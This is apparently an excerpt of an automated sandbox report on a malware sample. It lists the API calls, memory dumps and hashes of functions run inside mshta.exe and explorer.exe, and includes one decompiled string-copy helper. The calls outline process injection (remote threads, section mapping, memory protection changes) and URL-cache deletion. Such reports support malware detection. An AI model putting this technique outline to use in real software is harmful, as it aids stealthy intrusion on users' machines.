Part of subcall function 02F6A8D2: StrChrA.SHLWAPI(?,0000003F,?,?,02F6A006,?,?,?,?,00000102,02F666AF,?,?,00000000,00000000), ref: 02F6A8EA

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02F6A006,?,?,?,?,00000102,02F666AF,?), ref: 02F66BD8
lstrcpy.KERNEL32(00000000,00000000), ref: 02F66BE8
lstrcpy.KERNEL32(00000000,00000000), ref: 02F66BF4

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 07d1835d0a7155327620acf2a35a6bd6e86d31b992aa9a8fe31dfdc8b47163cf
Instruction ID: 12ecd7eae02f230ebb96dc816e5a404b8de0fcb2b389abc2449036f817d51b9e
Opcode Fuzzy Hash: 07d1835d0a7155327620acf2a35a6bd6e86d31b992aa9a8fe31dfdc8b47163cf
Instruction Fuzzy Hash: 6D21817290425AFBCB115FB58D4CABABFADDF067C4B054055EA44DB201D779D9108BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F65FCB, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02F65FCB(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E02F658BE(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x02f65fe0
0x02f65fe4
0x02f65fee
0x02f65ff3
0x02f65ff8
0x02f65ffa
0x02f66002
0x02f66007
0x02f66015
0x02f6601a
0x02f66024

APIs

lstrlenW.KERNEL32(004F0053,?,75145520,00000008,03AA937C,?,02F6694E,004F0053,03AA937C,?,?,?,?,?,?,02F69C10), ref: 02F65FDB
lstrlenW.KERNEL32(02F6694E,?,02F6694E,004F0053,03AA937C,?,?,?,?,?,?,02F69C10), ref: 02F65FE2

Part of subcall function 02F658BE: RtlAllocateHeap.NTDLL(00000000,-00000008,02F61C51), ref: 02F658CA

memcpy.NTDLL(00000000,004F0053,751469A0,?,?,02F6694E,004F0053,03AA937C,?,?,?,?,?,?,02F69C10), ref: 02F66002
memcpy.NTDLL(751469A0,02F6694E,00000002,00000000,004F0053,751469A0,?,?,02F6694E,004F0053,03AA937C), ref: 02F66015

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 49a9f114dba5db8c1d73d4a3a1d810696e9a42064706a00e06b6a2b5ed69b45b
Instruction ID: 994f16290d6677fa5ce7148c6e21220906e5cfb47637498fcad2d6dcd753063a
Opcode Fuzzy Hash: 49a9f114dba5db8c1d73d4a3a1d810696e9a42064706a00e06b6a2b5ed69b45b
Instruction Fuzzy Hash: 4DF04F72900119BB8F11EFE8CC89CDF7BADEF092947454066EA04D7201E735EA109BE0

Uniqueness

Uniqueness Score: -1.00%

Function 02F69DEF, Relevance: 5.0, APIs: 4, Instructions: 24stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,00000000,02F65335,616D692F,00000000), ref: 02F69DFB
lstrlen.KERNEL32(?), ref: 02F69E03

Part of subcall function 02F658BE: RtlAllocateHeap.NTDLL(00000000,-00000008,02F61C51), ref: 02F658CA

lstrcpy.KERNEL32(00000000,?), ref: 02F69E1A
lstrcat.KERNEL32(00000000,?), ref: 02F69E25

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: a1ff8ab89745fed62792b578af416295cc79785b998c9063f20c4b630fb8dbc6
Instruction ID: b140efb4888e594ae4d292d7aa8c23c0541ed7967cd33f72a709228b459048a6
Opcode Fuzzy Hash: a1ff8ab89745fed62792b578af416295cc79785b998c9063f20c4b630fb8dbc6
Instruction Fuzzy Hash: 6AE01233C05626BB87126BA4AD0CC5FFBA9FF896907054D16F694D3114C731C8258BE1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mshta.exe PID: 5092 Parent PID: 3472 mshta.exeCOMMON

Executed Functions

Function 0000025EE6940FB9, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000003.400039242.0000025EE6940000.00000010.00000001.sdmp, Offset: 0000025EE6940000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 6012d7085581ae7796c5ed89aff12479c24daa7359ea26f7577f3edbcbdab71f
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash: 9D9002444B684655D81812912C8A25C51406788161FD544D0481794145D45E0796215A

Uniqueness

Uniqueness Score: -1.00%

Function 0000025EE6940FC1, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000003.400039242.0000025EE6940000.00000010.00000001.sdmp, Offset: 0000025EE6940000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 6012d7085581ae7796c5ed89aff12479c24daa7359ea26f7577f3edbcbdab71f
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash: 9D9002444B684655D81812912C8A25C51406788161FD544D0481794145D45E0796215A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: explorer.exe PID: 3472 Parent PID: 6620 explorer.exeCOMMON

Executed Functions

Function 03B5C0C0, Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 302threadCOMMON

Download Yara Rule

APIs

FindFirstUrlCacheEntryW.WININET ref: 03B5C0E1
FindFirstUrlCacheEntryW.WININET ref: 03B5C130
DeleteUrlCacheEntryW.WININET ref: 03B5C149
FindNextUrlCacheEntryW.WININET ref: 03B5C167
PathFileExistsW.SHLWAPI ref: 03B5C2A0
PathFileExistsW.SHLWAPI ref: 03B5C2E6
PathFileExistsW.SHLWAPI ref: 03B5C314
RtlExitUserThread.NTDLL ref: 03B5C3DE

Strings

, xrefs: 03B5C241

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: CacheEntry$ExistsFileFindPath$First$DeleteExitNextThreadUser
String ID:
API String ID: 1466278703-3916222277
Opcode ID: f0ab9d79374e90352086ea66210c8efd0eb394fb213d58fe61ae6c6f81a6ee06
Instruction ID: 20e437bfa736d40f4afaa6882c9fec75e26170b9fd6d00b4a60306e85dc641ef
Opcode Fuzzy Hash: f0ab9d79374e90352086ea66210c8efd0eb394fb213d58fe61ae6c6f81a6ee06
Instruction Fuzzy Hash: 6E917431718A188FEB68EF68DC8962977E6F798300B34447DE84AC3261DE34D946CB42

Uniqueness

Uniqueness Score: -1.00%

Function 03B76A5C, Relevance: 9.4, APIs: 4, Strings: 1, Instructions: 648memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 03B76B04

Strings

@, xrefs: 03B76F3B

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: AllocateHeap
String ID: @
API String ID: 1279760036-2766056989
Opcode ID: df9999ad1371f6775146a5a642c9b5fcf4651608be9b946bdb7d09e9f0f86fdb
Instruction ID: 61a146c91e92c72279377dc1c8d0605e8d506f310512ef70c57d558cedad884c
Opcode Fuzzy Hash: df9999ad1371f6775146a5a642c9b5fcf4651608be9b946bdb7d09e9f0f86fdb
Instruction Fuzzy Hash: 15126130618F0A8FDB59EF28D885A66B3E1FB98305F4446BED45AC3251EF34E9458B81

Uniqueness

Uniqueness Score: -1.00%

Function 03B710A0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationToken.NTDLL ref: 03B71154
NtQueryInformationToken.NTDLL ref: 03B7119C
NtClose.NTDLL ref: 03B711D4
NtClose.NTDLL ref: 03B711E2

Strings

0, xrefs: 03B710FF

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: CloseInformationQueryToken
String ID: 0
API String ID: 3130709563-4108050209
Opcode ID: 3821b13fdee61393d8201b82e2ad874d5ba9cf6c48eb3caa2c2352ede4b1addb
Instruction ID: 0c0e6208352e934ad6d3ddd546598d78a1dd09a8c0fa317995ebf9b409902869
Opcode Fuzzy Hash: 3821b13fdee61393d8201b82e2ad874d5ba9cf6c48eb3caa2c2352ede4b1addb
Instruction Fuzzy Hash: 09312A30218B888FD764EF69D8C4B9AB7E1FB98305F504A6DE48EC7250CB349945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 03B70180, Relevance: 7.8, APIs: 5, Instructions: 285fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 03B70264
FindFirstFileA.KERNEL32 ref: 03B70303
FindNextFileA.KERNELBASE ref: 03B7035F
FindNextFileA.KERNELBASE ref: 03B70420
FindClose.KERNEL32 ref: 03B70488

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: FileFind$Next$CloseCreateFirst
String ID:
API String ID: 1873968597-0
Opcode ID: f9d86b3d019403bd02b9ebacc44e2a28187c09b202cb5ce2629446148cbf33ba
Instruction ID: 93eb1a78944ab9e47a5a82232ea547b5ce6cf8deab9ccddb0a4ce56d2ea5bbef
Opcode Fuzzy Hash: f9d86b3d019403bd02b9ebacc44e2a28187c09b202cb5ce2629446148cbf33ba
Instruction Fuzzy Hash: 6C91C77121CB448FE754FF28D8899AA77E1F798304F04467EE49BC3291EE74D9458782

Uniqueness

Uniqueness Score: -1.00%

Function 03B52710, Relevance: 6.2, APIs: 4, Instructions: 187nativethreadinjectionCOMMON

Download Yara Rule

APIs

NtSetInformationProcess.NTDLL ref: 03B527B8
CreateRemoteThread.KERNEL32 ref: 03B5285E
FindCloseChangeNotification.KERNEL32 ref: 03B528B0

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: ChangeCloseCreateFindInformationNotificationProcessRemoteThread
String ID:
API String ID: 1964589409-0
Opcode ID: 5d99f2c2c8f49470327325e2a9c4fb84222903334073c307134f8fd040975a90
Instruction ID: 9e457bd22d2f7d92d617b669ef7f47c70d44b6ad677f2f6b4d559fbf6fe0c2cc
Opcode Fuzzy Hash: 5d99f2c2c8f49470327325e2a9c4fb84222903334073c307134f8fd040975a90
Instruction Fuzzy Hash: B651B330619B098FE728EF68D88836677E5EF99305F0409BDED0ACB251EF30D8458B52

Uniqueness

Uniqueness Score: -1.00%

Function 03B79494, Relevance: 5.3, APIs: 4, Instructions: 251memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03B62DC4: NtQueryInformationProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002), ref: 03B62E0E

VirtualAlloc.KERNEL32 ref: 03B794E7
VirtualFree.KERNELBASE ref: 03B79608
VirtualAlloc.KERNEL32 ref: 03B79625
VirtualFree.KERNELBASE ref: 03B796B9

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: Virtual$AllocFree$InformationProcessQuery
String ID:
API String ID: 455085918-0
Opcode ID: 168765a35044e95a8d990b40fcc15325026f9faa516650cea44e10f8483daac9
Instruction ID: 86f29103ad2122468c3c8664cd328cd3e0eb9bc7bb0585f5afdc19ec10583959
Opcode Fuzzy Hash: 168765a35044e95a8d990b40fcc15325026f9faa516650cea44e10f8483daac9
Instruction Fuzzy Hash: FE61F43161CB184FE769EB28984567AB3D5FB84354F1942BDE89BD3241EF34E80287C2

Uniqueness

Uniqueness Score: -1.00%

Function 03B6A054, Relevance: 4.9, APIs: 3, Instructions: 445registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32 ref: 03B6A0AA
RegQueryValueA.ADVAPI32 ref: 03B6A0CD
RegQueryValueA.ADVAPI32 ref: 03B6A114

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: QueryValue$Open
String ID:
API String ID: 1606891134-0
Opcode ID: 10cda344e1f7f4cc7811e988502b88b6b24b699fbe4dd5da2bfe80f247e8cf34
Instruction ID: a86528423812ed5ded82547eff84fc7606782427714683d842d70788b6c85c3c
Opcode Fuzzy Hash: 10cda344e1f7f4cc7811e988502b88b6b24b699fbe4dd5da2bfe80f247e8cf34
Instruction Fuzzy Hash: B1D19574618A488FCB58EF28D889AA9B7E1FB95304F1485BDD45BC3262DF34E845CB42

Uniqueness

Uniqueness Score: -1.00%

Function 03B5E2F0, Relevance: 4.8, APIs: 3, Instructions: 303memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32 ref: 03B5E351
VirtualAlloc.KERNEL32 ref: 03B5E45A
VirtualFree.KERNELBASE ref: 03B5E536

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: Virtual$AllocCreateFreeHeap
String ID:
API String ID: 2341667014-0
Opcode ID: 387cc7682204ae4d9a0c54c31e49e59cc3dc5be86b4bf12ba6832ed983167f0e
Instruction ID: 763c4226ff311c8c08117d9a6bb6d2e5ccde138367435f562c8549dac2663d8b
Opcode Fuzzy Hash: 387cc7682204ae4d9a0c54c31e49e59cc3dc5be86b4bf12ba6832ed983167f0e
Instruction Fuzzy Hash: 7891C330218B498FE729EF28E8897AA73D5FB98305F14417DE887C7251EF38D9068B41

Uniqueness

Uniqueness Score: -1.00%

Function 03B5A85C, Relevance: 4.7, APIs: 3, Instructions: 179fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32 ref: 03B5A917
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,-00000001,?,?,03B52EE3), ref: 03B5A9CB
FindNextFileW.KERNELBASE ref: 03B5A9E3

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: File$Find$DeleteFirstNext
String ID:
API String ID: 146514751-0
Opcode ID: 3d6298d859f13a4746b0164a603c2d4e32a30961787150d2f5da59fcd26743a2
Instruction ID: 6ab9754ebe4ce641d3e35b58f5c6c3abacefc53c894935b3d27a82b6a0c44e9e
Opcode Fuzzy Hash: 3d6298d859f13a4746b0164a603c2d4e32a30961787150d2f5da59fcd26743a2
Instruction Fuzzy Hash: BC517330308B498FEB65EF69D88872677E5FB98345F144579E84AD3260DF38D842CB41

Uniqueness

Uniqueness Score: -1.00%

Function 03B5F8AC, Relevance: 4.1, APIs: 2, Instructions: 1128synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexExA.KERNEL32 ref: 03B5F979
GetShellWindow.USER32 ref: 03B5FC6E

Part of subcall function 03B78568: CreateFileMappingW.KERNELBASE ref: 03B785F1
Part of subcall function 03B78568: MapViewOfFile.KERNELBASE ref: 03B7861D

Part of subcall function 03B6B64C: CreateThread.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 03B6B67C
Part of subcall function 03B6B64C: QueueUserAPC.KERNEL32 ref: 03B6B693

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: Create$File$MappingMutexQueueShellThreadUserViewWindow
String ID:
API String ID: 2666063627-0
Opcode ID: e107f95206ea1759afd0aa749ae430eba4298a2b5f310c18b36aee93495cfbbc
Instruction ID: b55140dd8d2f91f2d7ac7194a57863f6a7f9130f7b5edef794a0cca331c8f4cd
Opcode Fuzzy Hash: e107f95206ea1759afd0aa749ae430eba4298a2b5f310c18b36aee93495cfbbc
Instruction Fuzzy Hash: 8772B071618B088FE728EF28EC85669B7E5F798704B24457ED48BC3261DE3CD5478B82

Uniqueness

Uniqueness Score: -1.00%

Function 03B58790, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214nativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL ref: 03B58932

Part of subcall function 03B613A8: NtMapViewOfSection.NTDLL ref: 03B613F4

Strings

0, xrefs: 03B58926

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: Section$CreateView
String ID: 0
API String ID: 1585966358-4108050209
Opcode ID: e98382719e47ce79b272ec845e25f25eebabc307cf9bcbfb5ceebf661db9868d
Instruction ID: d72a397d8143022ca748afe1ae4050c9348200f220a7756070603cc294144459
Opcode Fuzzy Hash: e98382719e47ce79b272ec845e25f25eebabc307cf9bcbfb5ceebf661db9868d
Instruction Fuzzy Hash: 8561C47021CB098FDB54EF28D885765B7E5FB98305F1445AEE84AC7261EB34D941CB82

Uniqueness

Uniqueness Score: -1.00%

Function 03B7174C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegisterDeviceNotificationA.USER32 ref: 03B7178F

Strings

, xrefs: 03B7177F

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: DeviceNotificationRegister
String ID:
API String ID: 3632112801-3916222277
Opcode ID: d32df13acaa4dc45c4794d5b992a20f50995c3cd79687ffa3715a8dc3cc9a712
Instruction ID: 72956661dba063ff4bda4dec55d34dfed4fe7ce0a5f609dc7b92e1f4c85707cd
Opcode Fuzzy Hash: d32df13acaa4dc45c4794d5b992a20f50995c3cd79687ffa3715a8dc3cc9a712
Instruction Fuzzy Hash: 4BF06971608B088FD744EF2CE48825AB7E1FBDC314F044BAAA89EC3204DB7496048B82

Uniqueness

Uniqueness Score: -1.00%

Function 03B6F0C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 03B6F0FD

Strings

@, xrefs: 03B6F0E1

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: AllocateMemoryVirtual
String ID: @
API String ID: 2167126740-2766056989
Opcode ID: 88b8825b9b3689d044394f35be5b99f0b658dcc5545216e4aa40f955ceee6651
Instruction ID: 7fa37b8a075c7a77b9dad3bb3d185949c2c55254c61d3766f13049d74db38c36
Opcode Fuzzy Hash: 88b8825b9b3689d044394f35be5b99f0b658dcc5545216e4aa40f955ceee6651
Instruction Fuzzy Hash: D2F0B4B0719B048FDB44DFA8E8CD5397BE0F74C305F4009ACE11ACB255DB7886088745

Uniqueness

Uniqueness Score: -1.00%

Function 03B8A004, Relevance: 3.4, APIs: 2, Instructions: 350nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 03B8A2A3
NtProtectVirtualMemory.NTDLL ref: 03B8A332

Memory Dump Source

Source File: 00000025.00000002.641912224.0000000003B8A000.00000040.00000001.sdmp, Offset: 03B8A000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: f074409ee7f28ca6429c9e5e2517a8fad0feeb99c7496d5b499460e0dd59e942
Instruction ID: 6478dab960f88254faceb146cfe110c314ffe4775369c48b954472c1373fb2ff
Opcode Fuzzy Hash: f074409ee7f28ca6429c9e5e2517a8fad0feeb99c7496d5b499460e0dd59e942
Instruction Fuzzy Hash: 2CB1F33161CB884FC729EF28C8816A6B7E1FB96304F5845BED4CBC7252E634A546C742

Uniqueness

Uniqueness Score: -1.00%

Function 03B68208, Relevance: 3.2, APIs: 2, Instructions: 183memorynativeCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 03B68233
NtQueryInformationProcess.NTDLL ref: 03B6827D

Part of subcall function 03B60BE8: NtReadVirtualMemory.NTDLL ref: 03B60C07

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: AllocateHeapInformationMemoryProcessQueryReadVirtual
String ID:
API String ID: 886377554-0
Opcode ID: 20cfe99fdf9d183f322bb0a75281e08624d6776da5c15488ca49e86960bdab9f
Instruction ID: 1b7eda48b435471de2569c5042950c2ca9d6ce38cd1aff4307d0380b0694dfeb
Opcode Fuzzy Hash: 20cfe99fdf9d183f322bb0a75281e08624d6776da5c15488ca49e86960bdab9f
Instruction Fuzzy Hash: B851943021CB484BD759EB28D8947A6B3D5FBD8309F04457EA84DC7246DE38DA41C782

Uniqueness

Uniqueness Score: -1.00%

Function 03B60C34, Relevance: 1.9, APIs: 1, Instructions: 383fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32 ref: 03B60D47

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 5d2462210e5cd9a0dfcb9ff526145c1b62c3cacc9be9b7bf15bf60267ae6a96f
Instruction ID: bcf0edfe9e43467e6fc9a82bbf2e54104a7c9a15dba0f5b15a2ae8c98a9c3593
Opcode Fuzzy Hash: 5d2462210e5cd9a0dfcb9ff526145c1b62c3cacc9be9b7bf15bf60267ae6a96f
Instruction Fuzzy Hash: 4AC14231618B488FDBA4EF68D888A6AB7E2FB9C301F54857DD44EC3251DB38D945CB41

Uniqueness

Uniqueness Score: -1.00%

Function 03B5F204, Relevance: 1.8, APIs: 1, Instructions: 350fileCOMMON

Download Yara Rule

APIs

Part of subcall function 03B68518: GetTempFileNameA.KERNEL32 ref: 03B6858F

DeleteFileA.KERNEL32(?,?,?,-00000010,?,?,?,03B56267), ref: 03B5F30A

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: File$DeleteNameTemp
String ID:
API String ID: 1648863064-0
Opcode ID: 932e6970ae6f847aefa2def9bd730e3b81b6e2f039d26921ef90eb482a7f3ff0
Instruction ID: 87d07ad8b3195304c67728bab6e597208bd6271827e6ee27b72d076d957b3b23
Opcode Fuzzy Hash: 932e6970ae6f847aefa2def9bd730e3b81b6e2f039d26921ef90eb482a7f3ff0
Instruction Fuzzy Hash: 2691FA3061CB498FEB28EF39989577AF7D6EBD4219B1441BDEC8BC7251EE24D4028781

Uniqueness

Uniqueness Score: -1.00%

Function 03B5BD6C, Relevance: 1.8, APIs: 1, Instructions: 336COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32 ref: 03B5BF09

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 6bf4983be28edca9181b6f6e6239959f036f19dd41bdd69b959d40199c2faf8a
Instruction ID: 38141b8303bc4541bd8dcc265dc961b0b4eea368dcab18857bf2898b618ebfeb
Opcode Fuzzy Hash: 6bf4983be28edca9181b6f6e6239959f036f19dd41bdd69b959d40199c2faf8a
Instruction Fuzzy Hash: DDA19130618B498FDB64DF28D885B66B7E5FB98315F54497DE98EC3250DB30E842CB82

Uniqueness

Uniqueness Score: -1.00%

Function 03B62DC4, Relevance: 1.8, APIs: 1, Instructions: 261nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002), ref: 03B62E0E

Part of subcall function 03B60BE8: NtReadVirtualMemory.NTDLL ref: 03B60C07

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: InformationMemoryProcessQueryReadVirtual
String ID:
API String ID: 1498878907-0
Opcode ID: 38917a5b2d51ae57f3df99727d69e1838c3631503869d89f090d75fead301cdc
Instruction ID: 85d83d8fc2cf97f6032abe3cba245db45269c7afdd184c693dcfc4a0942a0152
Opcode Fuzzy Hash: 38917a5b2d51ae57f3df99727d69e1838c3631503869d89f090d75fead301cdc
Instruction Fuzzy Hash: 0D81B831608B498FDB18EF1CD8855A9B3E5FB98304F14467EE88AC7252DB34E9558782

Uniqueness

Uniqueness Score: -1.00%

Function 03B68800, Relevance: 1.6, APIs: 1, Instructions: 81nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 03B68868

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: cdbb9660149d809d1519a14f4ed44b6f7be8a225e9b40769c126977493ee0554
Instruction ID: 8165406d255ee2d21d5b7e7ede8fc69aed336a651f1f0e4a5e41c6490e6f3692
Opcode Fuzzy Hash: cdbb9660149d809d1519a14f4ed44b6f7be8a225e9b40769c126977493ee0554
Instruction Fuzzy Hash: 84218130708A098FEB58EFAC98D476677E1FB98714F0950B8A60AC7261DB78D840C782

Uniqueness

Uniqueness Score: -1.00%

Function 03B623A4, Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 03B623CA

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 1bfb4a0377598c79d0d0a3324faf4bd036f0c13e57f4dbdeb4fbbbd026dcd8ec
Instruction ID: fa02233a15f5d5b2a9241f28e9fb9f48b99c5cac7d6d7a92fdfdfc47318dcda6
Opcode Fuzzy Hash: 1bfb4a0377598c79d0d0a3324faf4bd036f0c13e57f4dbdeb4fbbbd026dcd8ec
Instruction Fuzzy Hash: 76018630318E0D8FAB84DF68D4C4A6573E4FBE830975409BE984AC7155D738D585C701

Uniqueness

Uniqueness Score: -1.00%

Function 03B613A8, Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL ref: 03B613F4

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
Instruction ID: 08302625fd3185ea7276ab01fdd357ec7ed9092cc758449caad3081261184e19
Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
Instruction Fuzzy Hash: 380116B0A08B048FCB44DF69D0C8569BBE0FB58311B10067FE849C7796DB30D885CB45

Uniqueness

Uniqueness Score: -1.00%

Function 03B60BE8, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtReadVirtualMemory.NTDLL ref: 03B60C07

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: MemoryReadVirtual
String ID:
API String ID: 2834387570-0
Opcode ID: cec383d4cd5be70a93901608133fcba7ac5038a2d71a3e75e1f85135671025c5
Instruction ID: 3678365f8555c2674941438264c46e414b374d429452d38bd358d95cf86362b6
Opcode Fuzzy Hash: cec383d4cd5be70a93901608133fcba7ac5038a2d71a3e75e1f85135671025c5
Instruction Fuzzy Hash: 57E0D835714A844FE704BBF698C827D73D1F748209F0008BDE841C7321D63DC8848341

Uniqueness

Uniqueness Score: -1.00%

